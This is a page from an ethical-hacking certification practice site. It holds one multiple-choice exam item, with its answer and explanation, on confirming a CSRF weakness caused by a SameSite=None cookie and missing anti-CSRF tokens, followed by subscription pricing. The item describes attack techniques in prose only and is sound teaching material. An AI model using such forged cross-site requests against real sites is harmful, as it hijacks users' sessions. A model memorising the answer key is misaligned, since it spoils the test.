You also observe that none of the application's sensitive POST forms include anti-CSRF tokens. What is the most appropriate next step to confirm the likely vulnerability created by this configuration?
Inject a reflected XSS payload into a query-string parameter to attempt stealing the auth cookie.
Place time-based SQL-injection payloads inside the auth cookie value to test for blind SQL injection.
Create a proof-of-concept page on a different domain that auto-submits a sensitive POST request to the target site and observe whether the action executes while you are still logged in.
Attempt session fixation by replaying the same auth cookie after logging out and logging back in.
Because the authentication cookie is explicitly marked SameSite=None, browsers will attach it to cross-site requests. With no server-side CSRF token in the POST forms, an attacker can craft a malicious page that silently submits a forged POST while the victim is logged in. Building and hosting such a proof-of-concept page and observing whether the state-changing action succeeds will confirm a cross-site request forgery vulnerability. The other actions (reflected XSS injection, session fixation, or SQL-injection testing inside the cookie) target unrelated weaknesses and would not verify the CSRF risk caused by the cookie's SameSite=None attribute combined with absent CSRF tokens.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What does SameSite=None mean in cookies?
Open an interactive chat with Bash
What are anti-CSRF tokens and why are they important?
Open an interactive chat with Bash
How does crafting a proof-of-concept page confirm CSRF vulnerabilities?
Open an interactive chat with Bash
Certified Ethical Hacker (CEH)
Web Application Hacking
Your Score:
Report Issue
Bash, the Crucial Exams Chat Bot
AI Bot
Loading...
Loading...
Loading...
Pass with Confidence.
IT & Cybersecurity Package
You have hit the limits of our free tier, become a Premium Member today for unlimited access.
Military, Healthcare worker, Gov. employee or Teacher? See if you qualify for a Community Discount.
Monthly
$19.99 $11.99
$11.99/mo
Billed monthly, Cancel any time.
$19.99 after promotion ends
3 Month Pass
$44.99 $26.99
$8.99/mo
One time purchase of $26.99, Does not auto-renew.
$44.99 after promotion ends
Save $18!
MOST POPULAR
Annual Pass
$119.99 $71.99
$5.99/mo
One time purchase of $71.99, Does not auto-renew.
$119.99 after promotion ends
Save $48!
BEST DEAL
Lifetime Pass
$189.99 $113.99
One time purchase, Good for life.
Save $76!
What You Get
All IT & Cybersecurity Package plans include the following perks and exams .